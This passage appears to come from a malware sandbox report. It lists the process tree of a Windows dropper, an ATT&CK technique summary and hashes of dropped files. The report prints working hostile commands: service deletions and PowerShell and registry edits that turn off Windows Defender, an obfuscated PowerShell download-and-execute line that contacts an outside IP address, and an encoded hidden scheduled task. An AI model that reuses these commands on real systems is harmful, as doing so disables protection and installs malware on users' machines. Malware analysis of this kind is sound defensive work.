C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg13⤵
-
C:\Windows\Regedit.exe"C:\Windows\Regedit.exe" /S Offer.reg14⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f11⤵
-
C:\Windows\SysWOW64\sc.exesc delete SgrmBroker11⤵
-
C:\Windows\SysWOW64\sc.exesc delete SgrmAgent11⤵
-
C:\Windows\SysWOW64\sc.exesc delete SecurityHealthService11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdBoot11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdFiltrer11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdNisSvc11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdNisDrv11⤵
-
C:\Windows\SysWOW64\sc.exesc delete wscsvc11⤵
-
C:\Windows\SysWOW64\sc.exesc delete Sense11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WinDefend11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 211⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
-
C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe"C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im lp8mRbbLvvUw_NlFQIsm6Yjz.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im lp8mRbbLvvUw_NlFQIsm6Yjz.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\V8mSDJYVZdnfkoOXRHQbNy2T.exe"C:\Users\Admin\Documents\V8mSDJYVZdnfkoOXRHQbNy2T.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 4487⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 4407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_5.exesotema_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.exesotema_3.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 10646⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.exesotema_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_4.exesotema_4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3608 -ip 36081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 860 -ip 8601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4364 -ip 43641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3616 -ip 36161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 43921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4164 -ip 41641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3616 -ip 36161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4364 -ip 43641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 43921⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSEBE4.tmp\Install.exe.\Install.exe /S /site_id "525403"1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"2⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&3⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:324⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"2⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&3⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:324⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glXJtTKwq" /SC once /ST 00:01:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glXJtTKwq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glXJtTKwq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\bbbRMuC.exe\" j6 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4300 -ip 43001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 1204 -ip 12041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4164 -ip 41641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2412 -ip 24121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4164 -ip 41641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4164 -ip 41641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4164 -ip 41641⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4996 -ip 49961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4164 -ip 41641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4164 -ip 41641⤵
-
C:\Users\Admin\AppData\Roaming\jfvffjrC:\Users\Admin\AppData\Roaming\jfvffjr1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4164 -ip 41641⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3New Service
1Hidden Files and Directories
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1Hidden Files and Directories
2Impair Defenses
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sotema_7.exe.logMD5
84cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exeMD5
5f7ba8143c4972572616b8a6d276bb75
SHA1b8e513a74b825e183ba88d6a3eafdb638c263640
SHA25682594365c8fbfdbe9518dfbf8e0aadb20819401a691b9a3f4aa7da26ab7fe35d
SHA5124ae453c1b44eb69f8d006cb64e1ceb2f7f5852fa0240e03d597f11a411e4509555cf6d8dcafb2dfd9dba6fc546128e8ae82afdd1cd54a66d8451a37257ce58d8
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exeMD5
5f7ba8143c4972572616b8a6d276bb75
SHA1b8e513a74b825e183ba88d6a3eafdb638c263640
SHA25682594365c8fbfdbe9518dfbf8e0aadb20819401a691b9a3f4aa7da26ab7fe35d
SHA5124ae453c1b44eb69f8d006cb64e1ceb2f7f5852fa0240e03d597f11a411e4509555cf6d8dcafb2dfd9dba6fc546128e8ae82afdd1cd54a66d8451a37257ce58d8
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.exeMD5
6e487aa1b2d2b9ef05073c11572925f2
SHA1b2b58a554b75029cd8bdf5ffd012611b1bfe430b
SHA25677eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597
SHA512b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.txtMD5
6e487aa1b2d2b9ef05073c11572925f2
SHA1b2b58a554b75029cd8bdf5ffd012611b1bfe430b
SHA25677eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597
SHA512b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.exeMD5
d7cf78337caf7883c9f8b186fb577703
SHA182c15f16cc293f7bb1dd2803dc4fbf3f172704e0
SHA2563520ea8b719e1dd4dae76882ef73e38eae549e78b871d6f28166264339fe77ef
SHA512f17584ef6d9dccafe5df3df29fbb4b3d8fdcb9e5517be36664a13d14c4bdf8825f05ee1f010081db4bfa0df26a372cd480fccee4c3ebe11acb47fb189987508c
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.txtMD5
d7cf78337caf7883c9f8b186fb577703
SHA182c15f16cc293f7bb1dd2803dc4fbf3f172704e0
SHA2563520ea8b719e1dd4dae76882ef73e38eae549e78b871d6f28166264339fe77ef
SHA512f17584ef6d9dccafe5df3df29fbb4b3d8fdcb9e5517be36664a13d14c4bdf8825f05ee1f010081db4bfa0df26a372cd480fccee4c3ebe11acb47fb189987508c
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.exeMD5
cd7484811f927da2302bb6a1054802cf
SHA1e19672a18f519e7b67d9bd4ce29f82c503b146ff
SHA25607c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7
SHA512356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.txtMD5
cd7484811f927da2302bb6a1054802cf
SHA1e19672a18f519e7b67d9bd4ce29f82c503b146ff
SHA25607c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7
SHA512356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_4.exeMD5
5668cb771643274ba2c375ec6403c266
SHA1dd78b03428b99368906fe62fc46aaaf1db07a8b9
SHA256d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384
SHA512135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_4.txtMD5
5668cb771643274ba2c375ec6403c266
SHA1dd78b03428b99368906fe62fc46aaaf1db07a8b9
SHA256d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384
SHA512135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_5.exeMD5
6c3e0a1c839e28ca5b7c12695bd50c9d
SHA1f3c2177fabb8dee68cad911a56e221bae930a12f
SHA2562a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12
SHA512980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_5.txtMD5
6c3e0a1c839e28ca5b7c12695bd50c9d
SHA1f3c2177fabb8dee68cad911a56e221bae930a12f
SHA2562a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12
SHA512980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_6.exeMD5
987d0f92ed9871031e0061e16e7bbac4
SHA1b69f3badc82b6da0ff311f9dc509bac244464332
SHA256adb98685d3d6a8fa5e90b6fd9d458601d874718d5815f8aab66728ba9d067440
SHA512f4ecf0bd996fd9aab99eba225bed9dbe2af3f8857a32bc9f0eda2c2fe8b468f5f853e68e96c029cf4cfd161409e072777db92a7502b58b541e0057b449f79770
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_6.txtMD5
987d0f92ed9871031e0061e16e7bbac4
SHA1b69f3badc82b6da0ff311f9dc509bac244464332
SHA256adb98685d3d6a8fa5e90b6fd9d458601d874718d5815f8aab66728ba9d067440
SHA512f4ecf0bd996fd9aab99eba225bed9dbe2af3f8857a32bc9f0eda2c2fe8b468f5f853e68e96c029cf4cfd161409e072777db92a7502b58b541e0057b449f79770
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeMD5
5632c0cda7da1c5b57aeffeead5c40b7
SHA1533805ba88fbd008457616ae2c3b585c952d3afe
SHA2562b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
SHA512e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeMD5
5632c0cda7da1c5b57aeffeead5c40b7
SHA1533805ba88fbd008457616ae2c3b585c952d3afe
SHA2562b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
SHA512e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeMD5
5632c0cda7da1c5b57aeffeead5c40b7
SHA1533805ba88fbd008457616ae2c3b585c952d3afe
SHA2562b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
SHA512e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeMD5
5632c0cda7da1c5b57aeffeead5c40b7
SHA1533805ba88fbd008457616ae2c3b585c952d3afe
SHA2562b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
SHA512e86a2c0eb84b41bae94a1d29cc26c069d7ba0da8ed06f26192bd4e601b1c0168b2396734e17f585da531976125178f9a230ef7071cbd616cb070c44bcc16b990
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeMD5
5632c0cda7da1c5b57aeffeead5c40b7
SHA1533805ba88fbd008457616ae2c3b585c952d3afe
SHA2562b4a3c6d5d62270440c34e1ea75ba2878523eccc4ef85692c0e9497b6f1a8f43
